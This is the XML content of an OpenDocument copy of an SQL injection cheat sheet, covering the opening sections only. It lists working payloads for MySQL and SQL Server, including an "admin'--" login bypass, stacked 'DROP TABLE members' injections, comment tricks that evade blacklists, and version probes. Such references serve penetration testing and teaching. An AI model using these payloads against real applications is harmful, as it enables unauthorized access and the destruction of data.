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3729in" table:align="left"/>
    </style:style>
    <style:style style:name="Table1.A" style:family="table-column">
      <style:table-column-properties style:column-width="0.4132in"/>
    </style:style>
    <style:style style:name="Table1.B" style:family="table-column">
      <style:table-column-properties style:column-width="1.9597in"/>
    </style:style>
    <style:style style:name="Table1.A1" style:family="table-cell">
      <style:table-cell-properties style:vertical-align="middle" fo:padding="0.0313in" fo:border="none"/>
    </style:style>
    <style:style style:name="Table2" style:family="table">
      <style:table-properties style:width="5.3in" table:align="left" fo:background-color="#cccccc">
        <style:background-image/>
      </style:table-properties>
    </style:style>
    <style:style style:name="Table2.A" style:family="table-column">
      <style:table-column-properties style:column-width="0.8174in"/>
    </style:style>
    <style:style style:name="Table2.B" style:family="table-column">
      <style:table-column-properties style:column-width="1.0042in"/>
    </style:style>
    <style:style style:name="Table2.C" style:family="table-column">
      <style:table-column-properties style:column-width="0.6972in"/>
    </style:style>
    <style:style style:name="Table2.D" style:family="table-column">
      <style:table-column-properties style:column-width="0.9903in"/>
    </style:style>
    <style:style style:name="Table2.E" style:family="table-column">
      <style:table-column-properties style:column-width="0.8271in"/>
    </style:style>
    <style:style style:name="Table2.F" style:family="table-column">
      <style:table-column-properties style:column-width="0.9639in"/>
    </style:style>
    <style:style style:name="Table2.A1" style:family="table-cell">
      <style:table-cell-properties style:vertical-align="middle" fo:background-color="#f7f7f7" fo:padding="0.0521in" fo:border="none">
        <style:background-image/>
      </style:table-cell-properties>
    </style:style>
    <style:style style:name="Table2.B1" style:family="table-cell">
      <style:table-cell-properties style:vertical-align="middle" fo:background-color="#ffffff" fo:padding="0.0521in" fo:border="none">
        <style:background-image/>
      </style:table-cell-properties>
    </style:style>
    <style:style style:name="Table2.B2" style:family="table-cell">
      <style:table-cell-properties style:vertical-align="middle" fo:background-color="#99cc00" fo:padding="0.0521in" fo:border="none">
        <style:background-image/>
      </style:table-cell-properties>
    </style:style>
    <style:style style:name="Table2.F2" style:family="table-cell">
      <style:table-cell-properties style:vertical-align="middle" fo:background-color="#333333" fo:padding="0.0521in" fo:border="none">
        <style:background-image/>
      </style:table-cell-properties>
    </style:style>
    <style:style style:name="P1" style:family="paragraph" style:parent-style-name="Table_20_Contents">
      <style:paragraph-properties fo:text-align="end" style:justify-single-word="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1"/>
    <style:style style:name="P4" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L2">
      <style:paragraph-properties fo:margin-top="0in" fo:margin-bottom="0in"/>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paragraph-properties fo:margin-top="0in" fo:margin-bottom="0in"/>
    </style:style>
    <style:style style:name="P8" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L4"/>
    <style:style style:name="P9" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L5">
      <style:paragraph-properties fo:margin-top="0in" fo:margin-bottom="0in"/>
    </style:style>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paragraph-properties fo:margin-top="0in" fo:margin-bottom="0in"/>
    </style:style>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paragraph-properties fo:margin-top="0in" fo:margin-bottom="0in"/>
    </style:style>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paragraph-properties fo:margin-top="0in" fo:margin-bottom="0in"/>
    </style:style>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paragraph-properties fo:margin-top="0in" fo:margin-bottom="0in"/>
    </style:style>
    <style:style style:name="P30" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L21"/>
    <style:style style:name="P31" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L22">
      <style:paragraph-properties fo:margin-top="0in" fo:margin-bottom="0in"/>
    </style:style>
    <style:style style:name="P32" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L22"/>
    <style:style style:name="P33" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L23">
      <style:paragraph-properties fo:margin-top="0in" fo:margin-bottom="0in"/>
    </style:style>
    <style:style style:name="P34" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L23"/>
    <style:style style:name="P35" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L24"/>
    <style:style style:name="P36" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L24">
      <style:paragraph-properties fo:margin-top="0in" fo:margin-bottom="0in"/>
    </style:style>
    <style:style style:name="P37" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L25">
      <style:paragraph-properties fo:margin-top="0in" fo:margin-bottom="0in"/>
    </style:style>
    <style:style style:name="P38" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L25"/>
    <style:style style:name="P39" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L26"/>
    <style:style style:name="P40" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L27"/>
    <style:style style:name="P41" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L27">
      <style:paragraph-properties fo:margin-top="0in" fo:margin-bottom="0in"/>
    </style:style>
    <style:style style:name="P42" style:family="paragraph" style:parent-style-name="Preformatted_20_Text">
      <style:paragraph-properties fo:margin-top="0in" fo:margin-bottom="0.1965in"/>
    </style:style>
    <style:style style:name="P43" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L28"/>
    <style:style style:name="P44" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L29">
      <style:paragraph-properties fo:margin-top="0in" fo:margin-bottom="0in"/>
    </style:style>
    <style:style style:name="P45" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L29"/>
    <style:style style:name="P46" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L30"/>
    <style:style style:name="P47" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L31"/>
    <style:style style:name="P48" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L32">
      <style:paragraph-properties fo:margin-top="0in" fo:margin-bottom="0in"/>
    </style:style>
    <style:style style:name="P49" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L32"/>
    <style:style style:name="P50" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L33">
      <style:paragraph-properties fo:margin-top="0in" fo:margin-bottom="0in"/>
    </style:style>
    <style:style style:name="P51" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L33"/>
    <style:style style:name="P52" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L34">
      <style:paragraph-properties fo:margin-top="0in" fo:margin-bottom="0in"/>
    </style:style>
    <style:style style:name="P53" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L34"/>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gr"/>SQL Injection Cheat Sheet </text:h>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="Emphasis">SQL Injection Cheat Sheet, </text:span><text:span text:style-name="Emphasis"><text:span text:style-name="Strong_20_Emphasis">Document Version 1.4</text:span></text:span></text:p>
      <text:h text:style-name="Heading_20_2" text:outline-level="2" text:is-list-header="true"><text:bookmark text:name="about"/>About SQL Injection Cheat Sheet </text:h>
      <text:p text:style-name="Text_20_body">Currently only for <text:span text:style-name="Strong_20_Emphasis">MySQL</text:span> and <text:span text:style-name="Strong_20_Emphasis">Microsoft SQL Server, </text:span>some <text:span text:style-name="Strong_20_Emphasis">ORACLE</text:span> and some <text:span text:style-name="Strong_20_Emphasis">PostgreSQL</text:span>. Most of samples are not correct for every single situation. Most of the real world environments may change because of parenthesis, different code bases and unexpected, strange SQL sentences. <text:line-break/><text:line-break/>Samples are provided to allow reader to get basic idea of a potential attack and almost every section includes a brief information about itself. </text:p>
      <table:table table:name="Table1" table:style-name="Table1">
        <table:table-column table:style-name="Table1.A"/>
        <table:table-column table:style-name="Table1.B"/>
        <table:table-row>
          <table:table-cell table:style-name="Table1.A1" office:value-type="string">
            <text:p text:style-name="P1"><text:span text:style-name="Strong_20_Emphasis">M : </text:span></text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table1.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">MySQL </text:p>
          </table:table-cell>
        </table:table-row>
        <table:table-row>
          <table:table-cell table:style-name="Table1.A1" office:value-type="string">
            <text:p text:style-name="P1"><text:span text:style-name="Strong_20_Emphasis">S : </text:span></text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table1.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">SQL Server</text:p>
          </table:table-cell>
        </table:table-row>
        <table:table-row>
          <table:table-cell table:style-name="Table1.A1" office:value-type="string">
            <text:p text:style-name="P1"><text:span text:style-name="Strong_20_Emphasis">P : </text:span></text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table1.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">PostgreSQL</text:p>
          </table:table-cell>
        </table:table-row>
        <table:table-row>
          <table:table-cell table:style-name="Table1.A1" office:value-type="string">
            <text:p text:style-name="P1"><text:span text:style-name="Strong_20_Emphasis">O : </text:span></text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table1.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Oracle</text:p>
          </table:table-cell>
        </table:table-row>
        <table:table-row>
          <table:table-cell table:style-name="Table1.A1" office:value-type="string">
            <text:p text:style-name="P1"><text:span text:style-name="Strong_20_Emphasis">+ : </text:span></text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table1.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Possibly all other databases </text:p>
          </table:table-cell>
        </table:table-row>
      </table:table>
      <text:h text:style-name="Heading_20_5" text:outline-level="5" text:is-list-header="true"><text:span text:style-name="Strong_20_Emphasis"><text:span text:style-name="Emphasis">Examples;</text:span></text:span></text:h>
      <text:list text:style-name="L1">
        <text:list-item>
          <text:p text:style-name="P2"><text:span text:style-name="Emphasis">(MS) means : MySQL and SQL Server etc. </text:span></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P3">(M*S) means : Only in some versions of MySQL or special conditions see related note and SQL Server </text:p>
        </text:list-item>
      </text:list>
      <text:h text:style-name="Heading_20_2" text:outline-level="2" text:is-list-header="true"><text:bookmark text:name="TOC"/>Table Of Contents </text:h>
      <text:list text:style-name="L2">
        <text:list-item>
          <text:p text:style-name="P4"><text:a xlink:type="simple" xlink:href="http://ferruh.mavituna.com/makale/sql-injection-cheatsheet/#about">About SQL Injection Cheat Sheet </text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P4"><text:a xlink:type="simple" xlink:href="http://ferruh.mavituna.com/makale/sql-injection-cheatsheet/#SyntaxBasicAttacks">Syntax Reference, Sample Attacks and Dirty SQL Injection Tricks </text:a></text:p>
          <text:list>
            <text:list-item>
              <text:p text:style-name="P4"><text:a xlink:type="simple" xlink:href="http://ferruh.mavituna.com/makale/sql-injection-cheatsheet/#LineComments">Line Comments </text:a></text:p>
              <text:list>
                <text:list-item>
                  <text:p text:style-name="P4"><text:a xlink:type="simple" xlink:href="http://ferruh.mavituna.com/makale/sql-injection-cheatsheet/#LineCommentAttacks">SQL Injection Attack Samples</text:a> </text:p>
                </text:list-item>
              </text:list>
            </text:list-item>
            <text:list-item>
              <text:p text:style-name="P4"><text:a xlink:type="simple" xlink:href="http://ferruh.mavituna.com/makale/sql-injection-cheatsheet/#InlineComments">Inline Comments </text:a></text:p>
              <text:list>
                <text:list-item>
                  <text:p text:style-name="P4"><text:a xlink:type="simple" xlink:href="http://ferruh.mavituna.com/makale/sql-injection-cheatsheet/#InlineSamples">Classical Inline Comment SQL Injection Attack Samples</text:a> </text:p>
                </text:list-item>
              </text:list>
            </text:list-item>
          </text:list>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P4"><text:a xlink:type="simple" xlink:href="http://ferruh.mavituna.com/makale/sql-injection-cheatsheet/#MySQLInlineSamples">MySQL Version Detection Sample Attacks</text:a> </text:p>
          <text:list>
            <text:list-item>
              <text:p text:style-name="P4"><text:a xlink:type="simple" xlink:href="http://ferruh.mavituna.com/makale/sql-injection-cheatsheet/#StackingQueries">Stacking Queries</text:a> </text:p>
              <text:list>
                <text:list-item>
                  <text:p text:style-name="P4"><text:a xlink:type="simple" xlink:href="http://ferruh.mavituna.com/makale/sql-injection-cheatsheet/#LangDbFigure">Language / Database Stacked Query Support Table </text:a></text:p>
                </text:list-item>
              </text:list>
            </text:list-item>
          </text:list>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P4"><text:a xlink:type="simple" xlink:href="http://ferruh.mavituna.com/makale/sql-injection-cheatsheet/#AboutMySQLandPHP">About MySQL and PHP</text:a> </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P4"><text:a xlink:type="simple" xlink:href="http://ferruh.mavituna.com/makale/sql-injection-cheatsheet/#StackedSamples">Stacked SQL Injection Attack Samples</text:a> </text:p>
          <text:list>
            <text:list-item>
              <text:p text:style-name="P4"><text:a xlink:type="simple" xlink:href="http://ferruh.mavituna.com/makale/sql-injection-cheatsheet/#IfStatements">If Statements</text:a> </text:p>
              <text:list>
                <text:list-item>
                  <text:p text:style-name="P4"><text:a xlink:type="simple" xlink:href="http://ferruh.mavituna.com/makale/sql-injection-cheatsheet/#MySQLIf">MySQL If Statement</text:a> </text:p>
                </text:list-item>
              </text:list>
            </text:list-item>
          </text:list>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P4"><text:a xlink:type="simple" xlink:href="http://ferruh.mavituna.com/makale/sql-injection-cheatsheet/#SQLServerIf">SQL Server If Statement </text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P4"><text:a xlink:type="simple" xlink:href="http://ferruh.mavituna.com/makale/sql-injection-cheatsheet/#SampleIfStatements">If Statement SQL Injection Attack Samples </text:a></text:p>
          <text:list>
            <text:list-item>
              <text:p text:style-name="P4"><text:a xlink:type="simple" xlink:href="http://ferruh.mavituna.com/makale/sql-injection-cheatsheet/#UsingIntegers">Using Integers </text:a></text:p>
            </text:list-item>
          </text:list>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P4"><text:a xlink:type="simple" xlink:href="http://ferruh.mavituna.com/makale/sql-injection-cheatsheet/#StringOperations">String  Operations</text:a> </text:p>
          <text:list>
            <text:list-item>
              <text:list>
                <text:list-item>
                  <text:p text:style-name="P4"><text:a xlink:type="simple" xlink:href="http://ferruh.mavituna.com/makale/sql-injection-cheatsheet/#StringConcat">String Concatenation </text:a></text:p>
                </text:list-item>
              </text:list>
            </text:list-item>
            <text:list-item>
              <text:p text:style-name="P4"><text:a xlink:type="simple" xlink:href="http://ferruh.mavituna.com/makale/sql-injection-cheatsheet/#StringwithoutQuotes">Strings without Quotes</text:a> </text:p>
              <text:list>
                <text:list-item>
                  <text:p text:style-name="P4"><text:a xlink:type="simple" xlink:href="http://ferruh.mavituna.com/makale/sql-injection-cheatsheet/#HexbasedSamples">Hex based SQL Injection Samples</text:a> </text:p>
                </text:list-item>
              </text:list>
            </text:list-item>
            <text:list-item>
              <text:p text:style-name="P4"><text:a xlink:type="simple" xlink:href="http://ferruh.mavituna.com/makale/sql-injection-cheatsheet/#StringModification">String Modification &amp; Related </text:a></text:p>
            </text:list-item>
          </text:list>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P4"><text:a xlink:type="simple" xlink:href="http://ferruh.mavituna.com/makale/sql-injection-cheatsheet/#UnionInjections">Union Injections</text:a> </text:p>
          <text:list>
            <text:list-item>
              <text:list>
                <text:list-item>
                  <text:p text:style-name="P4"><text:a xlink:type="simple" xlink:href="http://ferruh.mavituna.com/makale/sql-injection-cheatsheet/#UnionLanguageIssues">UNION – Fixing Language Issues</text:a> </text:p>
                </text:list-item>
              </text:list>
            </text:list-item>
            <text:list-item>
              <text:p text:style-name="P4"><text:a xlink:type="simple" xlink:href="http://ferruh.mavituna.com/makale/sql-injection-cheatsheet/#ByPassingLoginScreens">Bypassing Login Screens</text:a> </text:p>
            </text:list-item>
          </text:list>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P4"><text:a xlink:type="simple" xlink:href="http://ferruh.mavituna.com/makale/sql-injection-cheatsheet/#Enablecmdshell">Enabling xp_cmdshell in SQL Server 2005 </text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P5"><text:span text:style-name="Emphasis">Other parts are not so well formatted but check out by yourself, drafts, notes and stuff, scroll down and see. </text:span></text:p>
        </text:list-item>
      </text:list>
      <text:h text:style-name="Heading_20_2" text:outline-level="2" text:is-list-header="true"><text:bookmark text:name="SyntaxBasicAttacks"/>Syntax Reference, Sample Attacks and Dirty SQL Injection Tricks </text:h>
      <text:h text:style-name="Heading_20_3" text:outline-level="3" text:is-list-header="true"><text:bookmark text:name="21"/>Ending / Commenting Out / Line Comments </text:h>
      <text:h text:style-name="Heading_20_4" text:outline-level="4" text:is-list-header="true"><text:bookmark text:name="LineComments"/>Line Comments </text:h>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="Strong_20_Emphasis">Comments out rest of the query.</text:span><text:line-break/>Line comments are generally useful for ignoring rest of the query so you don’t have to deal with fixing the syntax.</text:p>
      <text:list text:style-name="L3">
        <text:list-item>
          <text:p text:style-name="P6"><text:span text:style-name="Source_20_Text">-- </text:span>(SM)<text:span text:style-name="Source_20_Text"><text:line-break/>DROP sampletable;--</text:span></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P6"><text:span text:style-name="Source_20_Text"># </text:span>(M)<text:span text:style-name="Source_20_Text"><text:line-break/>DROP sampletable;#</text:span> </text:p>
        </text:list-item>
      </text:list>
      <text:h text:style-name="Heading_20_5" text:outline-level="5" text:is-list-header="true"><text:bookmark text:name="LineCommentAttacks"/>Line Comments Sample SQL Injection Attacks</text:h>
      <text:list text:style-name="L4">
        <text:list-item>
          <text:p text:style-name="P7">Username:<text:span text:style-name="Source_20_Text"> admin'-- </text:span></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P8"><text:span text:style-name="Source_20_Text">SELECT * FROM members WHERE username = 'admin'--' AND password = 'password'<text:line-break/></text:span>This is going to log you as admin user, because rest of the SQL query will be ignored. </text:p>
        </text:list-item>
      </text:list>
      <text:h text:style-name="Heading_20_4" text:outline-level="4" text:is-list-header="true"><text:bookmark text:name="InlineComments"/>Inline Comments</text:h>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="Strong_20_Emphasis">Comments out rest of the query by not closing them</text:span> or you can use for <text:span text:style-name="Strong_20_Emphasis">bypassing blacklisting</text:span>, removing spaces, obfuscating and determining database versions.</text:p>
      <text:list text:style-name="L5">
        <text:list-item>
          <text:p text:style-name="P9"><text:span text:style-name="Source_20_Text">/*Comment Here*/</text:span> (SM) </text:p>
          <text:list>
            <text:list-item>
              <text:p text:style-name="P9"><text:span text:style-name="Source_20_Text">DROP/*comment*/sampletable</text:span> </text:p>
            </text:list-item>
          </text:list>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P9"><text:span text:style-name="Source_20_Text">DR/**/OP/*bypass blacklisting*/sampletable</text:span> </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P10"><text:span text:style-name="Source_20_Text">SELECT/*avoid-spaces*/password/**/FROM/**/Members</text:span></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P10"><text:span text:style-name="Source_20_Text">/*! MYSQL Special SQL *</text:span>/ (M)<text:line-break/>This is a special comment syntax for MySQL. It’s perfect for detecting MySQL version. If you put a code into this comments it’s going to execute in MySQL only. Also you can use this to execute some code only if the server is higher than supplied version.<text:line-break/><text:line-break/><text:span text:style-name="Source_20_Text">SELECT /*!</text:span><text:span text:style-name="Source_20_Text"><text:span text:style-name="Strong_20_Emphasis">32302</text:span></text:span><text:span text:style-name="Source_20_Text"> 1/0, */ 1 FROM tablename</text:span> </text:p>
        </text:list-item>
      </text:list>
      <text:h text:style-name="Heading_20_5" text:outline-level="5" text:is-list-header="true"><text:bookmark text:name="InlineSamples"/>Classical Inline Comment SQL Injection Attack Samples </text:h>
      <text:list text:style-name="L6">
        <text:list-item>
          <text:p text:style-name="P11">ID: <text:span text:style-name="Source_20_Text">10; DROP TABLE members /*</text:span><text:line-break/>Simply get rid of other stuff at the end the of query. Same as <text:span text:style-name="Source_20_Text">10; DROP TABLE members --</text:span></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P11"><text:span text:style-name="Source_20_Text">SELECT /*!</text:span><text:span text:style-name="Source_20_Text"><text:span text:style-name="Strong_20_Emphasis">32302</text:span></text:span><text:span text:style-name="Source_20_Text"> 1/0, */ 1 FROM tablename</text:span><text:line-break/>Will throw an <text:span text:style-name="Strong_20_Emphasis">divison by 0 error </text:span>if MySQL version is higher than <text:span text:style-name="Strong_20_Emphasis">3.23.02</text:span> </text:p>
        </text:list-item>
      </text:list>
      <text:h text:style-name="Heading_20_5" text:outline-level="5" text:is-list-header="true"><text:bookmark text:name="MySQLInlineSamples"/>MySQL Version Detection Sample Attacks</text:h>
      <text:list text:style-name="L7">
        <text:list-item>
          <text:p text:style-name="P12">ID: <text:span text:style-name="Source_20_Text">/*!</text:span><text:span text:style-name="Source_20_Text"><text:span text:style-name="Strong_20_Emphasis">32302</text:span></text:span><text:span text:style-name="Source_20_Text"> 10*/ </text:span></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P13">ID: <text:span text:style-name="Source_20_Text">10</text:span><text:line-break/>You will get the <text:span text:style-name="Strong_20_Emphasis">same response</text:span> if MySQL version is higher than <text:span text:style-name="Strong_20_Emphasis">3.23.02</text:span></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P13"><text:span text:style-name="Source_20_Text">SELECT /*!</text:span><text:span text:style-name="Source_20_Text"><text:span text:style-name="Strong_20_Emphasis">32302</text:span></text:span><text:span text:style-name="Source_20_Text"> 1/0, */ 1 FROM tablename</text:span><text:line-break/>Will throw an <text:span text:style-name="Strong_20_Emphasis">divison by 0 error </text:span>if MySQL version is higher than <text:span text:style-name="Strong_20_Emphasis">3.23.02</text:span> </text:p>
        </text:list-item>
      </text:list>
      <text:h text:style-name="Heading_20_3" text:outline-level="3" text:is-list-header="true"><text:bookmark text:name="StackingQueries"/>Stacking Queries </text:h>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="Strong_20_Emphasis">Executing more than one query in one transaction</text:span>. This is very useful in every injection point, especially in SQL Server back ended applications. </text:p>
      <text:list text:style-name="L8">
        <text:list-item>
          <text:p text:style-name="P14"><text:span text:style-name="Source_20_Text">;</text:span> (S)<text:line-break/><text:span text:style-name="Source_20_Text">SELECT * FROM members; DROP members--</text:span> </text:p>
        </text:list-item>
      </text:list>
      <text:p text:style-name="Text_20_body">Ends a query and starts a new one.</text:p>
      <text:h text:style-name="Heading_20_4" text:outline-level="4" text:is-list-header="true"><text:bookmark text:name="LangDbFigure"/>Language / Database Stacked Query Support Table </text:h>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="Strong_20_Emphasis">green:</text:span> supported, <text:span text:style-name="Strong_20_Emphasis">dark gray:</text:span> not supported, <text:span text:style-name="Strong_20_Emphasis">light gray: </text:span>unknow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able_20_Contents"> </text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table2.B1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents"><text:span text:style-name="Strong_20_Emphasis">SQL Server </text:span></text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table2.B1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents"><text:span text:style-name="Strong_20_Emphasis">MySQL</text:span></text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table2.B1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents"><text:span text:style-name="Strong_20_Emphasis">PostgreSQL</text:span></text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table2.B1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents"><text:span text:style-name="Strong_20_Emphasis">ORACLE</text:span></text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table2.B1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents"><text:span text:style-name="Strong_20_Emphasis">MS Access </text:span></text:p>
          </table:table-cell>
        </table:table-row>
        <table:table-row>
          <table:table-cell table:style-name="Table2.B1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents"><text:span text:style-name="Strong_20_Emphasis">ASP</text:span></text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table2.B2"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F2" office:value-type="string">
            <text:p text:style-name="Table_20_Contents"> </text:p>
          </table:table-cell>
        </table:table-row>
        <table:table-row>
          <table:table-cell table:style-name="Table2.B1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents"><text:span text:style-name="Strong_20_Emphasis">ASP.NET</text:span></text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table2.B2"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F2" office:value-type="string">
            <text:p text:style-name="Table_20_Contents"> </text:p>
          </table:table-cell>
        </table:table-row>
        <table:table-row>
          <table:table-cell table:style-name="Table2.B1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents"><text:span text:style-name="Strong_20_Emphasis">PHP</text:span></text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table2.B2" office:value-type="string">
            <text:p text:style-name="Table_20_Contents"> </text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table2.F2" office:value-type="string">
            <text:p text:style-name="Table_20_Contents"> </text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table2.B2" office:value-type="string">
            <text:p text:style-name="Table_20_Contents"> </text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table2.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents"> </text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table2.F2" office:value-type="string">
            <text:p text:style-name="Table_20_Contents"> </text:p>
          </table:table-cell>
        </table:table-row>
        <table:table-row>
          <table:table-cell table:style-name="Table2.B1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents"><text:span text:style-name="Strong_20_Emphasis">Java</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F2" office:value-type="string">
            <text:p text:style-name="Table_20_Contents"> </text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table2.F2" office:value-type="string">
            <text:p text:style-name="Table_20_Contents"> </text:p>
          </table:table-cell>
        </table:table-row>
      </table:table>
      <text:p text:style-name="Text_20_body"> </text:p>
      <text:p text:style-name="Text_20_body"><text:bookmark text:name="AboutMySQLandPHP"/><text:span text:style-name="Strong_20_Emphasis">About MySQL and PHP;</text:span><text:line-break/>To clarify some issues;<text:line-break/><text:span text:style-name="Strong_20_Emphasis">PHP - MySQL doesn't support stacked queries</text:span>, Java doesn't support stacked queries (<text:span text:style-name="Emphasis">I'm sure for ORACLE, not quite sure about other databases</text:span>). <text:span text:style-name="Emphasis">Normally MySQL supports stacked queries but because of database layer in most of the configurations it’s not possible to execute second query in PHP-MySQL applications or maybe MySQL client supports this, not quite sure. Can someone clarify?</text:span></text:p>
      <text:h text:style-name="Heading_20_5" text:outline-level="5" text:is-list-header="true"><text:bookmark text:name="StackedSamples"/>Stacked SQL Injection Attack Samples </text:h>
      <text:list text:style-name="L9">
        <text:list-item>
          <text:p text:style-name="P15">ID: <text:span text:style-name="Source_20_Text">10;DROP members --</text:span> </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P16"><text:span text:style-name="Source_20_Text">SELECT * FROM products WHERE id = 10; DROP members--</text:span> </text:p>
        </text:list-item>
      </text:list>
      <text:p text:style-name="Text_20_body">This will run <text:span text:style-name="Emphasis">DROP members</text:span> SQL sentence after normal SQL Query.</text:p>
      <text:h text:style-name="Heading_20_3" text:outline-level="3" text:is-list-header="true"><text:bookmark text:name="IfStatements"/>If Statements </text:h>
      <text:p text:style-name="Text_20_body">Get response based on a if statement. This is <text:span text:style-name="Strong_20_Emphasis">one of the key points of Blind SQL Injection</text:span>, also can be very useful to test simple stuff blindly and <text:span text:style-name="Strong_20_Emphasis">accurately</text:span>.</text:p>
      <text:h text:style-name="Heading_20_4" text:outline-level="4" text:is-list-header="true"><text:bookmark text:name="MySQLIf"/>MySQL If Statement</text:h>
      <text:list text:style-name="L10">
        <text:list-item>
          <text:p text:style-name="P17"><text:span text:style-name="Source_20_Text">IF(</text:span><text:span text:style-name="Source_20_Text"><text:span text:style-name="Strong_20_Emphasis"><text:span text:style-name="Emphasis">condition</text:span></text:span></text:span><text:span text:style-name="Source_20_Text"><text:span text:style-name="Strong_20_Emphasis">,</text:span></text:span><text:span text:style-name="Source_20_Text"><text:span text:style-name="Strong_20_Emphasis"><text:span text:style-name="Emphasis">true-part</text:span></text:span></text:span><text:span text:style-name="Source_20_Text"><text:span text:style-name="Strong_20_Emphasis">,</text:span></text:span><text:span text:style-name="Source_20_Text"><text:span text:style-name="Strong_20_Emphasis"><text:span text:style-name="Emphasis">false-part</text:span></text:span></text:span><text:span text:style-name="Source_20_Text">) </text:span>(M)<text:span text:style-name="Source_20_Text"><text:line-break/>SELECT IF(1=1,'true','false')</text:span> </text:p>
        </text:list-item>
      </text:list>
      <text:h text:style-name="Heading_20_4" text:outline-level="4" text:is-list-header="true"><text:bookmark text:name="SQLServerIf"/>SQL Server If Statement </text:h>
      <text:list text:style-name="L11">
        <text:list-item>
          <text:p text:style-name="P18"><text:span text:style-name="Source_20_Text">IF </text:span><text:span text:style-name="Source_20_Text"><text:span text:style-name="Emphasis"><text:span text:style-name="Strong_20_Emphasis">condition</text:span></text:span></text:span><text:span text:style-name="Source_20_Text"> </text:span><text:span text:style-name="Source_20_Text"><text:span text:style-name="Strong_20_Emphasis"><text:span text:style-name="Emphasis">true-part</text:span></text:span></text:span><text:span text:style-name="Source_20_Text"> ELSE </text:span><text:span text:style-name="Source_20_Text"><text:span text:style-name="Emphasis"><text:span text:style-name="Strong_20_Emphasis">false-part</text:span></text:span></text:span> (S)<text:line-break/><text:span text:style-name="Source_20_Text">IF (1=1) SELECT 'true' ELSE SELECT 'false'</text:span> </text:p>
        </text:list-item>
      </text:list>
